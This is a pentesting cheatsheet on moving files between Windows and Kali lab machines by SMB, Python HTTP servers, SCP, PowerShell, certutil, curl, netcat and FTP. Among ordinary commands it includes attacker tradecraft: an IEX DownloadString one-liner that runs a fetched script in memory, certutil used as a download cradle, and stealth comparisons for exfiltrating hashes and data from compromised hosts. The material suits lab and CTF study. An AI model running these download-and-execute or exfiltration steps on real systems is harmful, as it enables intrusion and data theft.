File transfer cheatsheet

Complete File Transfer Guide: Windows & Kali Linux (or other linux distros based on debian)

This guide provides multiple methods for transferring files between Windows and Kali Linux virtual machines.

Whether you're working on penetration testing labs, CTF challenges (TryHackMe, HackTheBox), or learning cybersecurity, you'll find the right method for your situation.

Why is File Transfer Important?

During penetration testing and security assessments, you frequently need to:

• Download files from a compromised system (victim) to your attack machine (Kali) for analysis

• Upload exploitation tools, scripts, or payloads to the target system

• Extract password hashes, configuration files, or sensitive data for offline cracking

• Transfer enumeration scripts and post-exploitation tools

• Move evidence and artifacts for documentation and reporting

Understanding multiple file transfer methods is essential because:

• Different environments have different tools available

• Some methods may be blocked by firewalls or security controls

• You need alternatives when your primary method fails

• Different methods have different stealth characteristics

Naming Conventions Used in This Guide

To maintain consistency and clarity, this guide uses the following placeholders:

• WINDOWS_IP - The IP address of your Windows VM (e.g., 192.168.1.10)

• KALI_IP - The IP address of your Kali Linux VM (e.g., 192.168.1.20)

• WINDOWS_USER - Your Windows username (e.g., Admin, Student)

• WINDOWS_PASSWORD - Your Windows user password

• KALI_USER - Your Kali Linux username (default is usually "kali")

• KALI_PASSWORD - Your Kali Linux user password

• FILENAME - The name of the file you want to transfer

• PORT - The network port number being used (e.g., 8000, 80, 443)

Replace these placeholders with your actual values when executing commands.

Prerequisites

Before you begin, ensure the following:

1. Network Connectivity: Both VMs must be on the same network (e.g., configured as "Share with my Mac" / NAT or Bridged). They should be able to ping each other.

2. IP Addresses: You need to know the IP address of each VM.

3. Firewall Settings: Some methods may require adjusting firewall rules on Windows or Kali.

4. Required Tools: Depending on the method, certain tools must be installed (covered in each section).

Quick Method Comparison

Method	Direction	Difficulty	Speed	Stealth	Requirements
1. SMB/CIFS Share	Both	Medium	Fast	Low	SMB enabled
2A. Python http.server	Download only	Easy	Fast	Low	Python (built-in)
2B. Python uploadserver	Both (upload+download)	Easy	Fast	Low	pipx install uploadserver
3. SCP/SSH	Both	Easy	Fast	Medium	SSH server
4. PowerShell Download	Kali→Win	Easy	Fast	Low	HTTP server on Kali
5. Certutil	Kali→Win	Easy	Medium	Medium	HTTP server on Kali
6. Curl	Both	Easy	Fast	Low	HTTP server on source
7. Wget (Windows)	Kali→Win	Easy	Fast	Low	HTTP server on Kali
8. Impacket SMB	Both	Medium	Fast	Medium	Impacket on Kali
9. Netcat	Both	Medium	Fast	High	Netcat on both
10. FTP	Both	Medium	Fast	Low	FTP server
11. Base64 Encoding	Both	Hard	Slow	High	None (manual)

Important Note: Methods 4-7 (PowerShell, Certutil, Curl, Wget) are download tools that require a Python HTTP server running on the source machine. See Method 2 for server setup.

Finding Your VM IP Addresses

You'll need the IP addresses for most of these methods. Here's how to find them.

On Your Windows VM

Open Command Prompt (cmd.exe) or PowerShell and run:

ipconfig

What to look for:

• Find your active network adapter (usually "Ethernet adapter" or "Wi-Fi adapter")

• Look for the line that says "IPv4 Address"

• Example output: IPv4 Address. . . . . . . . . . . : 192.168.1.10

• This is your WINDOWS_IP

Alternative method using PowerShell:

Get-NetIPAddress -AddressFamily IPv4 | Where-Object {$_.IPAddress -notlike "127.*"} | Select-Object IPAddress

On Your Kali Linux VM

Open a terminal and run:

ip a

What to look for:

• Find your primary network interface (usually eth0, ens33, or ens160)

• Look for the line starting with inet (not inet6)

• Example output: inet 192.168.1.20/24 brd 192.168.1.255 scope global dynamic eth0

• The IP address is 192.168.1.20 - this is your KALI_IP

Alternative method:

hostname -I

This will display all IP addresses assigned to your Kali machine.

Testing Connectivity

Before attempting file transfers, verify that both VMs can communicate:

From Windows to Kali:

ping KALI_IP

Example:

ping 192.168.1.20

From Kali to Windows:

ping WINDOWS_IP

Example:

ping 192.168.1.10

If ping fails, check:

• Both VMs are on the same network (NAT or Bridged)

• Windows Firewall is not blocking ICMP (ping) requests

• Network adapters are properly configured in VMware

Method 1: SMB/CIFS Shared Folders

Direction: Bidirectional (Windows ↔ Kali)

Difficulty: Medium

Best for: Frequent file transfers, persistent access to files

This method mounts a Windows folder directly into the Kali filesystem, allowing seamless file access.

Step 1: On Windows VM - Create and Share the Folder

1. Create a folder you want to share, for example: C:\SharedFiles

2. Right-click the folder and select Properties

3. Navigate to the Sharing tab and click Advanced Sharing...

4. Check the box "Share this folder"

5. Note the Share name (default is the folder name, e.g., "SharedFiles")

6. Click Permissions and configure access:

   • For lab environments: Give "Everyone" Full Control

   • For more security: Add specific users and set appropriate permissions

Warning: Granting "Everyone" full control is insecure and should only be done in a trusted, isolated virtual lab environment.

1. Click OK on all windows to apply settings

2. (Optional) Disable password-protected sharing for easier access:

   • Open Control Panel → Network and Sharing Center

   • Click Change advanced sharing settings

   • Under All Networks, turn off password protected sharing

   • Click Save changes

Step 2: On Kali Linux VM - Mount the Windows Share

Install required packages (if not already installed):

sudo apt update
sudo apt install cifs-utils

Create a mount point:

mkdir ~/windows-share

Mount the shared folder:

sudo mount -t cifs //WINDOWS_IP/SHARE_NAME /local/mount/point -o user=WINDOWS_USER,password=WINDOWS_PASSWORD

Example:

sudo mount -t cifs //192.168.1.10/SharedFiles ~/windows-share -o user=Admin,password=MyPassword123

If you disabled password-protected sharing:

sudo mount -t cifs //192.168.1.10/SharedFiles ~/windows-share -o guest,uid=1000,gid=1000

Explanation of options:

• -t cifs - Specifies the filesystem type (Common Internet File System)

• //WINDOWS_IP/SHARE_NAME - The network path to the Windows share

• ~/windows-share - Local directory where the share will be mounted

• -o user=USERNAME,password=PASSWORD - Mount options for authentication

• guest - Mount without authentication (if password protection is disabled)

• uid=1000,gid=1000 - Set ownership to your user (run id to find your uid/gid)

Step 3: Access and Transfer Files

List files from the Windows share:

ls -l ~/windows-share

Copy file from Windows to Kali:

cp ~/windows-share/FILENAME ~/

Copy file from Kali to Windows:

cp ~/local-file.txt ~/windows-share/

Work directly with files on the share:

# Edit a file
nano ~/windows-share/document.txt

# Run a script from the share
python3 ~/windows-share/script.py

Step 4: Unmount the Share

When finished, unmount the folder:

# Navigate out of the mounted directory first
cd ~

# Unmount the share
sudo umount ~/windows-share

If you get "target is busy" error:

# Find processes using the mount
sudo lsof | grep windows-share

# Force unmount
sudo umount -l ~/windows-share

Method 2: Python HTTP Servers

Direction: Bidirectional (Windows ↔ Kali)

Difficulty: Very Easy

Best for: Quick file transfers, no configuration needed

Python provides two types of HTTP servers for file transfers. Understanding the difference is crucial for choosing the right tool.

Understanding Python HTTP Servers: http.server vs uploadserver

Python has TWO different HTTP server options: one-way (download only), two-ways (download and upload). Below you will fond both methods described.

Option A: http.server (Built-in, Download Only)

When to use:

• Transferring files FROM the machine running the server TO another machine

• Quick file sharing (one-way)

• No installation wanted

Example use case:

• Kali has exploit.py, Windows needs it

• Run python3 -m http.server 8000 on Kali

• Download from Windows

Option B: uploadserver (External Package, Bidirectional)

This method can upload files through browser (drag & drop or button) but requires installation: pipx install uploadserver

When to use:

• Transferring files TO the machine running the server FROM another machine

• Need GUI upload capability

• Want drag & drop in browser

• Bidirectional transfers

Example use case:

• Need to exfiltrate data.zip from Windows to Kali

• Run uploadserver 8000 on Kali

• Open browser on Windows, drag & drop data.zip

Quick Comparison Table

Feature	http.server	uploadserver
Download files	Yes	Yes
Upload via browser	No	Yes
Installation	Built-in	Requires install
Drag & Drop	No	Yes
Direction	One-way (download)	Two-way (both)
Command	python3 -m http.server 8000	uploadserver 8000
Best for	Sharing files out	Receiving files in

Important: Which Server for Which Direction?

Scenario 1: Kali → Windows (Download from Kali)

• Use either: http.server OR uploadserver (both work)

• On Kali: python3 -m http.server 8000

• On Windows: Open browser → http://KALI_IP:8000 → Click files to download

Scenario 2: Windows → Kali (Upload to Kali)

• Must use: uploadserver (http.server won't work!)

• On Kali: uploadserver 8000

• On Windows: Open browser → http://KALI_IP:8000 → Click "Upload" or drag & drop

Scenario 3: Kali → Windows (Upload to Windows)

• Must use: uploadserver on Windows

• On Windows: python -m uploadserver 8000

• On Kali: Open browser → http://WINDOWS_IP:8000 → Upload files

Scenario 4: Windows → Kali (Download from Windows)

• Use either: http.server OR uploadserver on Windows

• On Windows: python -m http.server 8000

• On Kali: Open browser → http://WINDOWS_IP:8000 → Download files

Rule of Thumb:

Think about WHERE the files need to GO:

• Files going OUT from server → http.server works fine

• Files coming IN to server → Need uploadserver

Now let's see detailed examples for each scenario:

Detailed Examples (by Scenario)

Scenario A: Transfer FROM Windows TO Kali (Download from Windows)

What you need: Files on Windows that Kali needs to download

Which server: Either http.server or uploadserver (both work for downloads)

Step 1: On Windows VM - Start HTTP Server

1. Place files you want to transfer in a folder, for example: C:\TransferFiles

2. Open Command Prompt and navigate to that directory:

cd C:\TransferFiles

1. Start the Python HTTP server:

For Python 3:

python -m http.server 8000

For Python 2 (older systems):

python -m SimpleHTTPServer 8000

If python command is not found, try:

py -m http.server 8000

Explanation:

• python -m http.server - Runs Python's built-in HTTP server module

• 8000 - The port number (you can use any port between 1024-65535)

Expected output:

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

The server is now running and will show access logs when files are downloaded.

Step 2: On Kali Linux VM - Download Files

Method A: Using wget

# Download a single file
wget http://WINDOWS_IP:8000/FILENAME

# Example:
wget http://192.168.1.10:8000/passwords.txt

Download multiple files:

wget http://WINDOWS_IP:8000/file1.txt
wget http://WINDOWS_IP:8000/file2.pdf
wget http://WINDOWS_IP:8000/script.py

Download with a different name:

wget http://WINDOWS_IP:8000/original-name.txt -O new-name.txt

Method B: Using curl

# Download a file
curl http://WINDOWS_IP:8000/FILENAME -o FILENAME

# Example:
curl http://192.168.1.10:8000/data.zip -o data.zip

Method C: Using a web browser

1. Open Firefox or any browser on Kali

2. Navigate to: http://WINDOWS_IP:8000

3. You'll see a directory listing of all files

4. Click on any file to download it

Step 3: Stop the Server

On Windows, press Ctrl + C in the Command Prompt to stop the server.

Scenario B: Transfer FROM Kali TO Windows (Download from Kali)

What you need: Files on Kali that Windows needs to download

Which server: Either http.server or uploadserver (both work for downloads)

Step 1: On Kali Linux VM - Start HTTP Server

1. Navigate to the directory containing files to share:

cd ~/files-to-share

1. Start the Python HTTP server:

python3 -m http.server 8000

Use a different port if 8000 is busy:

python3 -m http.server 9000

Bind to a specific interface (more secure):

python3 -m http.server 8000 --bind KALI_IP

Expected output:

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Step 2: On Windows VM - Download Files

Method A: Using a web browser

1. Open any web browser (Edge, Chrome, Firefox)

2. Navigate to: http://KALI_IP:8000

3. Click on files to download them

Method B: Using PowerShell (see Method 4 for more details)

Invoke-WebRequest -Uri http://KALI_IP:8000/FILENAME -OutFile FILENAME

Method C: Using curl (Windows 10+)

curl http://KALI_IP:8000/FILENAME -o FILENAME

Method D: Using certutil (see Method 5 for more details)

certutil -urlcache -f http://KALI_IP:8000/FILENAME FILENAME

Step 3: Stop the Server

On Kali, press Ctrl + C in the terminal to stop the server.

Scenario C: Transfer FROM Windows TO Kali (Upload to Kali)

What you need: Files on Windows that need to be uploaded to Kali

Which server: MUST use uploadserver (http.server cannot receive uploads!)

Step 1: On Kali Linux VM - Install and Start Upload Server

Install uploadserver (if not already installed):

# On Kali Linux, use pipx (without sudo - installs for current user)
pipx install uploadserver

Important notes:

• Use pipx install without sudo - this installs for your current user to ~/.local/bin

• Do NOT use sudo pipx install - this would install for root user only

• On Kali Linux, pip3 install will fail with "externally-managed-environment" error

• After installation, the command uploadserver is available directly from terminal

Navigate to the directory where you want to receive files:

cd ~/received-files
# Or create a new directory
mkdir ~/uploads
cd ~/uploads

Start the upload server:

uploadserver 8000

Expected output:

File upload available at /upload
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Step 2: On Windows VM - Upload Files

Method A: Using a web browser (easiest)

1. Open any web browser (Edge, Chrome, Firefox)

2. Navigate to: http://KALI_IP:8000

3. You'll see the file listing AND an "Upload files" button

4. Click "Upload files" or drag & drop files into the browser window

5. Files are automatically uploaded to Kali

Method B: Using PowerShell (command line)

# Upload a single file
$uri = "http://KALI_IP:8000/upload"
$filePath = "C:\path\to\file.txt"
Invoke-RestMethod -Uri $uri -Method Post -InFile $filePath

Method C: Using curl (Windows 10+)

curl -X POST http://KALI_IP:8000/upload -F "files=@C:\path\to\file.txt"

Step 3: Stop the Server

On Kali, press Ctrl + C in the terminal to stop the server.

Step 4: Verify Files Received

ls -lh ~/uploads

Scenario D: Transfer FROM Kali TO Windows (Upload to Windows)

What you need: Files on Kali that need to be uploaded to Windows

Which server: MUST use uploadserver on Windows (http.server cannot receive uploads!)

Step 1: On Windows VM - Install and Start Upload Server

Install uploadserver (if not already installed):

# On Windows, use pip (virtual environment recommended)
pip install uploadserver

Navigate to the directory where you want to receive files:

cd C:\Uploads

Start the upload server:

python -m uploadserver 8000

Or if uploadserver is in PATH:

uploadserver 8000

Expected output:

File upload available at /upload
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Step 2: On Kali Linux VM - Upload Files

Method A: Using a web browser (easiest)

1. Open Firefox or any browser on Kali

2. Navigate to: http://WINDOWS_IP:8000

3. Click "Upload files" or drag & drop files

4. Files are uploaded to Windows

Method B: Using curl (command line)

curl -X POST http://WINDOWS_IP:8000/upload -F "files=@/path/to/file.txt"

Upload multiple files:

curl -X POST http://WINDOWS_IP:8000/upload -F "files=@file1.txt" -F "files=@file2.pdf"

Step 3: Stop the Server

On Windows, press Ctrl + C in the Command Prompt to stop the server.

Advanced Python HTTP Server Options

Serve on a specific port:

python3 -m http.server 9999

Serve from a specific directory without changing to it:

python3 -m http.server 8000 --directory /path/to/files

Note: For upload capabilities, see Scenario C and D above which cover uploadserver in detail.

Method 3: SCP (Secure Copy Protocol)

Direction: Bidirectional (Windows ↔ Kali)

Difficulty: Easy

Best for: Secure file transfers, command-line users

SCP uses SSH to securely transfer files between systems. It's fast, encrypted, and built into most modern systems.

Step 1: On Kali Linux VM - Ensure SSH Server is Running

Check if SSH is running:

sudo systemctl status ssh

If SSH is not running, start it:

sudo systemctl start ssh

To start SSH automatically on boot (optional, not recommended for security):

sudo systemctl enable ssh

Verify SSH is listening:

sudo netstat -tlnp | grep :22

You should see output showing SSH listening on port 22.

Step 2: Transfer Files Using SCP

Scenario A: Transfer from Windows to Kali

On Windows VM (Command Prompt or PowerShell):

Syntax:

scp C:\path\to\local\file KALI_USER@KALI_IP:/path/to/destination/

Example - Transfer a single file:

scp C:\Users\Admin\Documents\data.txt kali@192.168.1.20:~/

Example - Transfer to a specific directory:

scp C:\TransferFiles\passwords.txt kali@192.168.1.20:~/Documents/

Example - Transfer multiple files:

scp C:\Files\file1.txt C:\Files\file2.pdf kali@192.168.1.20:~/Downloads/

Example - Transfer an entire directory:

scp -r C:\MyFolder kali@192.168.1.20:~/

Explanation of options:

• -r - Recursive (for directories)

• KALI_USER@KALI_IP - Username and IP of the destination

• :~/ - Destination path (~ means home directory)

You will be prompted for the Kali user's password.

Scenario B: Transfer from Kali to Windows

Prerequisites on Windows:

• OpenSSH Server must be installed and running (Windows 10/11)

Install OpenSSH Server on Windows (if not installed):

1. Open Settings → Apps → Optional Features

2. Click Add a feature

3. Find and install OpenSSH Server

4. Start the service:

# Run as Administrator
net start sshd

# Set to start automatically (optional)
sc config sshd start=auto

On Kali Linux VM:

Syntax:

scp /path/to/local/file WINDOWS_USER@WINDOWS_IP:/path/to/destination/

Example - Transfer a single file:

scp ~/exploit.py Admin@192.168.1.10:/Users/Admin/Desktop/

Example - Transfer a directory:

scp -r ~/tools Admin@192.168.1.10:/Users/Admin/Documents/

Note: Windows paths in SCP use forward slashes (/) not backslashes ()

Scenario C: Download from Kali to Windows

On Windows VM:

Syntax:

scp KALI_USER@KALI_IP:/path/to/remote/file C:\local\destination\

Example:

scp kali@192.168.1.20:~/hashes.txt C:\Users\Admin\Desktop\

Download a directory:

scp -r kali@192.168.1.20:~/results C:\Users\Admin\Documents\

Scenario D: Download from Windows to Kali

On Kali Linux VM:

Syntax:

scp WINDOWS_USER@WINDOWS_IP:/path/to/remote/file /local/destination/

Example:

scp Admin@192.168.1.10:/Users/Admin/Documents/data.zip ~/Downloads/

Advanced SCP Options

Specify a different port (if SSH is not on port 22):

scp -P 2222 file.txt kali@KALI_IP:~/

Preserve file timestamps and permissions:

scp -p file.txt kali@KALI_IP:~/

Limit bandwidth (in Kbit/s):

scp -l 1000 largefile.iso kali@KALI_IP:~/

Use SSH key authentication (no password prompt):

scp -i ~/.ssh/id_rsa file.txt kali@KALI_IP:~/

Verbose output (for troubleshooting):

scp -v file.txt kali@KALI_IP:~/

Method 4: PowerShell Download Methods (Windows)

Direction: Kali → Windows (Download from Kali)

Difficulty: Easy

Best for: Downloading files to Windows, scripting, automation

Prerequisites: Python HTTP server running on Kali (either http.server or uploadserver)

PowerShell provides several built-in methods to download files from a web server. These methods work when you have a Python HTTP server running on Kali (see Method 2).

Before using these methods, start a server on Kali:

# On Kali - in the directory with files to share
python3 -m http.server 8000

Method A: Invoke-WebRequest (PowerShell 3.0+)

Invoke-WebRequest -Uri http://KALI_IP:PORT/FILENAME -OutFile FILENAME

Example:

Invoke-WebRequest -Uri http://192.168.1.20:8000/exploit.py -OutFile exploit.py

Download to a specific location:

Invoke-WebRequest -Uri http://192.168.1.20:8000/tool.exe -OutFile C:\Tools\tool.exe

Short alias (iwr):

iwr http://192.168.1.20:8000/script.ps1 -OutFile script.ps1

Explanation:

• Invoke-WebRequest - PowerShell cmdlet for web requests

• -Uri - The URL of the file to download

• -OutFile - Where to save the downloaded file

Method B: Invoke-RestMethod

Invoke-RestMethod -Uri http://KALI_IP:PORT/FILENAME -OutFile FILENAME

Example:

Invoke-RestMethod -Uri http://192.168.1.20:8000/data.json -OutFile data.json

Method 4C: WebClient Class (Older PowerShell versions)

Download a file:

(New-Object System.Net.WebClient).DownloadFile("http://KALI_IP:PORT/FILENAME", "C:\path\to\save\FILENAME")

Example:

(New-Object System.Net.WebClient).DownloadFile("http://192.168.1.20:8000/payload.exe", "C:\Temp\payload.exe")

Download as string (for scripts):

(New-Object System.Net.WebClient).DownloadString("http://KALI_IP:8000/script.ps1")

Download and execute in memory (advanced):

IEX (New-Object System.Net.WebClient).DownloadString("http://KALI_IP:8000/script.ps1")

Explanation:

• IEX - Invoke-Expression (executes the downloaded script)

• DownloadString - Downloads content as a string

• This is commonly used in penetration testing for fileless attacks

Method 4D: Start-BitsTransfer (Background Intelligent Transfer)

Start-BitsTransfer -Source http://KALI_IP:PORT/FILENAME -Destination C:\path\to\save\FILENAME

Example:

Start-BitsTransfer -Source http://192.168.1.20:8000/largefile.zip -Destination C:\Downloads\largefile.zip

Advantages:

• Resumes interrupted downloads

• Runs in the background

• Good for large files

Method 5: Certutil (Windows Built-in)

Direction: Kali → Windows (Download from Kali)

Difficulty: Easy

Best for: Downloading files when PowerShell is restricted, works on older Windows

Prerequisites: Python HTTP server running on Kali (either http.server or uploadserver)

Certutil is a Windows built-in command-line tool originally designed for certificate management, but it can download files from a web server.

Before using this method, start a server on Kali:

# On Kali - in the directory with files to share
python3 -m http.server 8000

Basic Usage

certutil -urlcache -f http://KALI_IP:PORT/FILENAME FILENAME

Example:

certutil -urlcache -f http://192.168.1.20:8000/nc.exe nc.exe

Download to a specific location:

certutil -urlcache -f http://192.168.1.20:8000/tool.exe C:\Temp\tool.exe

Explanation:

• certutil - Windows certificate utility

• -urlcache - URL cache operation

• -f - Force overwrite if file exists

• First URL is the source, second parameter is the destination filename

Why Use Certutil?

• Built into Windows (no installation needed)

• Works when PowerShell execution is restricted

• Often used in penetration testing and CTFs

• Less likely to be blocked than PowerShell in some environments

Method 6: Curl (Windows 10+ Built-in)

Direction: Bidirectional (Windows ↔ Kali)

Difficulty: Easy

Best for: Quick downloads, works on modern Windows

Prerequisites: Python HTTP server running on the source machine

Windows 10 (version 1803+) and Windows 11 include curl as a built-in command. Kali Linux has curl pre-installed.

Before using curl to download, start a server on the source machine:

# On Kali (if downloading from Kali to Windows)
python3 -m http.server 8000

# On Windows (if downloading from Windows to Kali)
python -m http.server 8000

Download Files with Curl on Windows

curl http://KALI_IP:PORT/FILENAME -o FILENAME

Example:

curl http://192.168.1.20:8000/exploit.py -o exploit.py

Download to a specific location:

curl http://192.168.1.20:8000/tool.exe -o C:\Tools\tool.exe

Download and show progress:

curl http://192.168.1.20:8000/largefile.zip -o largefile.zip --progress-bar

Follow redirects:

curl -L http://KALI_IP:8000/file.txt -o file.txt

Download with authentication:

curl -u username:password http://KALI_IP:8000/file.txt -o file.txt

Download Files with Curl on Kali

Curl is pre-installed on Kali Linux.

curl http://WINDOWS_IP:PORT/FILENAME -o FILENAME

Example:

curl http://192.168.1.10:8000/data.txt -o data.txt

Download multiple files:

curl http://KALI_IP:8000/file[1-5].txt -o "file#1.txt"

Curl Advanced Options

Silent mode (no progress bar):

curl -s http://KALI_IP:8000/file.txt -o file.txt

Resume interrupted download:

curl -C - http://KALI_IP:8000/largefile.iso -o largefile.iso

Download only if newer:

curl -z file.txt http://KALI_IP:8000/file.txt -o file.txt

Specify user agent:

curl -A "Mozilla/5.0" http://KALI_IP:8000/file.txt -o file.txt

Method 7: Wget on Windows

Direction: Kali → Windows (Download from Kali) Difficulty: Easy (requires installation) Best for: Advanced download features on Windows

Prerequisites: Python HTTP server running on Kali

Wget is not built into Windows but can be installed. It provides advanced download features.

Before using wget, start a server on Kali:

# On Kali - in the directory with files to share
python3 -m http.server 8000

Install Wget on Windows

Option 1: Using Chocolatey

choco install wget

Option 2: Download binary

• Download from: https://eternallybored.org/misc/wget/

• Place wget.exe in C:\Windows\System32\ or add to PATH

Using Wget on Windows

Syntax:

wget http://KALI_IP:PORT/FILENAME

Example:

wget http://192.168.1.20:8000/exploit.py

Download to a specific location:

wget http://192.168.1.20:8000/file.txt -O C:\Downloads\file.txt

Download recursively (entire directory):

wget -r http://192.168.1.20:8000/

Method 8: Impacket SMB Server

Direction: Bidirectional (Windows ↔ Kali)

Difficulty: Medium

Best for: Penetration testing scenarios, when SMB is available

Prerequisites: Impacket installed on Kali

Impacket's smbserver.py creates a temporary SMB share on Kali that Windows can access without authentication. This is commonly used in penetration testing and CTF challenges.

Prerequisites

Install Impacket on Kali (if not already installed):

# Option 1: Install via apt (recommended - easiest method)
sudo apt update
sudo apt install python3-impacket

# Option 2: Install via pipx (without sudo - installs for current user)
pipx install impacket

# Option 3: Install from GitHub
git clone https://github.com/fortra/impacket.git
cd impacket
pipx install .

Important notes about pipx:

• Use pipx install without sudo - installs for current user to ~/.local/bin

• Do NOT use sudo pipx install - this installs for root user only (not accessible to regular user)

• On Kali Linux, pip3 install will fail with "externally-managed-environment" error (PEP 668)

• Starting Kali Linux 2024.4, pipx is the recommended method for Python applications

• After installation with pipx, commands like impacket-smbserver are available directly from terminal

Scenario A: Transfer from Windows to Kali - WARNING - works only if SMB1 features are turned on on Windows

Step 1: On Kali Linux VM - Start SMB Server

impacket-smbserver SHARE_NAME /path/to/share/directory -smb2support

Example:

# Create a directory to share
mkdir ~/smb-share

# Start SMB server
impacket-smbserver share ~/smb-share -smb2support

With authentication (more secure):

impacket-smbserver share ~/smb-share -smb2support -username kali -password kali123

Explanation:

• impacket-smbserver - The Impacket SMB server tool

• share - The share name (can be anything)

• ~/smb-share - Local directory to share

• -smb2support - Enable SMB2 protocol (required for modern Windows)

• -username / -password - Optional authentication

Expected output:

Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

The server is now running and waiting for connections.

Step 2: On Windows VM - Access the SMB Share

Method 9A: Using File Explorer

1. Open File Explorer

2. In the address bar, type: \\KALI_IP\share

3. Press Enter

4. You can now drag and drop files to/from the share

Method 9B: Using Command Prompt

Copy file from Windows to Kali:

copy C:\path\to\file.txt \\KALI_IP\share\

Example:

copy C:\Users\Admin\passwords.txt \\192.168.1.20\share\

Copy file from Kali to Windows:

copy \\KALI_IP\share\file.txt C:\destination\

Example:

copy \\192.168.1.20\share\exploit.exe C:\Temp\

Method 9C: Using PowerShell

Copy-Item C:\path\to\file.txt \\KALI_IP\share\

Method 9D: Using net use (map network drive)

# Map the share to a drive letter
net use Z: \\KALI_IP\share

# Now you can access it like a local drive
copy C:\file.txt Z:\
dir Z:\

# Disconnect when done
net use Z: /delete

If authentication is required:

net use Z: \\KALI_IP\share /user:kali kali123

Step 3: Stop the SMB Server

On Kali, press Ctrl + C to stop the server.

Scenario B: Transfer from Kali to Windows

The process is the same - once the SMB server is running on Kali, Windows can both upload and download files. WARNING - works only if SMB1 features are turned on on Windows

On Kali, place files in the shared directory:

cp ~/exploit.py ~/smb-share/

On Windows, access and download:

copy \\KALI_IP\share\exploit.py C:\Tools\

Method 9: Netcat (nc)

Direction: Bidirectional (Windows ↔ Kali)

Difficulty: Medium

Best for: Simple file transfers, works in restricted environments

Prerequisites: Netcat installed on both machines

Netcat is a versatile networking tool that can transfer files over raw TCP connections. No HTTP server needed - it creates a direct connection between machines.

Prerequisites

On Kali: Netcat is pre-installed

On Windows: Download netcat for Windows

• Download from: https://eternallybored.org/misc/netcat/

• Or use ncat (comes with Nmap)

Scenario A: Transfer from Kali to Windows

Step 1: On Windows VM - Set up listener to receive file

nc -lvp PORT > FILENAME

Example:

nc -lvp 4444 > received-file.txt

Explanation:

• nc - Netcat command

• -l - Listen mode

• -v - Verbose output

• -p 4444 - Listen on port 4444

• > received-file.txt - Redirect received data to file

Step 2: On Kali Linux VM - Send the file

nc WINDOWS_IP PORT < FILENAME

Example:

nc 192.168.1.10 4444 < exploit.py

Explanation:

• < exploit.py - Read file and send its contents

The file transfer will complete automatically, and both netcat instances will close.

Scenario B: Transfer from Windows to Kali

Step 1: On Kali Linux VM - Set up listener

nc -lvp 4444 > received-file.exe

Step 2: On Windows VM - Send the file

nc KALI_IP 4444 < C:\path\to\file.exe

Example:

nc 192.168.1.20 4444 < C:\Users\Admin\data.zip

Transfer Directories with Netcat

On the receiving end (Kali):

nc -lvp 4444 | tar -xvf -

On the sending end (Windows with tar):

tar -cvf - C:\MyFolder | nc KALI_IP 4444

On Linux to Linux:

Receiver:

nc -lvp 4444 | tar -xzvf -

Sender:

tar -czvf - /path/to/directory | nc RECEIVER_IP 4444

Advanced Netcat Options

Show progress (using pv - pipe viewer):

On receiver:

nc -lvp 4444 | pv > file.zip

Encrypt transfer (using openssl):

Receiver:

nc -lvp 4444 | openssl enc -d -aes256 -pbkdf2 > file.txt

Sender:

openssl enc -aes256 -pbkdf2 -in file.txt | nc RECEIVER_IP 4444

Method 10: FTP Server

Direction: Bidirectional (Windows ↔ Kali)

Difficulty: Medium

Best for: Multiple file transfers, organized file management

Prerequisites: FTP server software installed

FTP provides a traditional file transfer protocol with directory browsing. Useful for organized file management and multiple transfers.

Scenario A: FTP Server on Kali

Step 1: Install and Configure FTP Server on Kali

Install vsftpd (Very Secure FTP Daemon):

sudo apt update
sudo apt install vsftpd

Configure vsftpd:

sudo nano /etc/vsftpd.conf

Key settings to enable:

anonymous_enable=NO
local_enable=YES
write_enable=YES
local_umask=022

Start the FTP service:

sudo systemctl start vsftpd

Check status:

sudo systemctl status vsftpd

Step 2: On Windows VM - Connect to FTP

Method 11A: Using File Explorer

1. Open File Explorer

2. In address bar, type: ftp://KALI_IP

3. Enter Kali username and password

4. Browse and transfer files

Method 11B: Using Command Prompt

ftp KALI_IP

Example FTP session:

ftp 192.168.1.20
# Enter username: kali
# Enter password: ****

# FTP commands:
ls                    # List files
cd directory          # Change directory
get filename          # Download file
put filename          # Upload file
mget *.txt           # Download multiple files
mput *.pdf           # Upload multiple files
binary               # Set binary mode (for executables)
ascii                # Set ASCII mode (for text files)
bye                  # Exit

Method 11C: Using PowerShell

# Download a file
$client = New-Object System.Net.WebClient
$client.Credentials = New-Object System.Net.NetworkCredential("kali", "password")
$client.DownloadFile("ftp://KALI_IP/file.txt", "C:\Downloads\file.txt")

Scenario B: Python FTP Server (Quick and Easy)

On Kali Linux VM:

Install pyftpdlib:

# On Kali Linux, use pipx (without sudo - installs for current user)
pipx install pyftpdlib

Important notes:

• Use pipx install without sudo - installs for current user to ~/.local/bin

• Do NOT use sudo pipx install - this installs for root user only

• On Kali Linux, pip3 install will fail with "externally-managed-environment" error

Start anonymous FTP server:

pyftpdlib -p 21 -w

Explanation:

• -p 21 - Port number (21 is standard FTP port)

• -w - Write permission (allows uploads)

Start FTP server with authentication:

pyftpdlib -p 21 -u kali -P kali123 -w

Explanation:

• -p 21 - Port number

• -u kali - Username

• -P kali123 - Password

• -w - Write permission (allows uploads)

Expected output:

[I 2024-01-15 10:30:00] >>> starting FTP server on 0.0.0.0:21, pid=1234 <<<
[I 2024-01-15 10:30:00] concurrency model: async
[I 2024-01-15 10:30:00] masquerade (NAT) address: None
[I 2024-01-15 10:30:00] passive ports: None

On Windows, connect using any FTP client or File Explorer.

Scenario C: FTP Server on Windows

Enable IIS FTP Server:

1. Open Control Panel → Programs → Turn Windows features on or off

2. Expand Internet Information Services

3. Expand FTP Server and check all boxes

4. Click OK and wait for installation

Configure FTP site in IIS Manager (detailed steps omitted for brevity)

Alternative: Use Python on Windows:

pip install pyftpdlib
python -m pyftpdlib -p 21 -w

Troubleshooting FTP

Error: "Connection refused"

• FTP server is not running

• Firewall blocking port 21

• Check with: sudo netstat -tlnp | grep :21

Error: "Login incorrect"

• Verify username and password

• Check vsftpd configuration allows local users

Passive mode issues:

• Configure passive port range in vsftpd.conf

• Or use active mode in FTP client

Method 11: Base64 Encoding (Manual Transfer)

Direction: Bidirectional (Windows ↔ Kali)

Difficulty: Hard

